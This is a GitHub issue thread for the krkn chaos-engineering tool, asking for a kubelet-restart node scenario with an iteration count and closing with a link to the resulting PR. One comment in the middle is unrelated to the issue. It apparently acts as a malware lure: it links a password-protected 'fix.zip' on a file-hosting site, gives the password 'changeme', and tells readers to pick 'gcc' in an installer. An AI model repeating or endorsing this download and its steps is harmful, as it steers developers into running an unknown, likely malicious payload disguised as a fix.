### ISSUE TITLE
Scenario to restart kubelet

### ISSUE THREAD

**Issue by chaitanyaenr** [krkn-chaos/krkn#687]
Node scenarios ( https://github.com/krkn-chaos/krkn/blob/main/docs/node_scenarios.md ) should support kubelet restart scenario with number of iterations as a parameter.

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by paigerube14** [comment]
PR for this was added here: https://github.com/krkn-chaos/krkn/pull/688
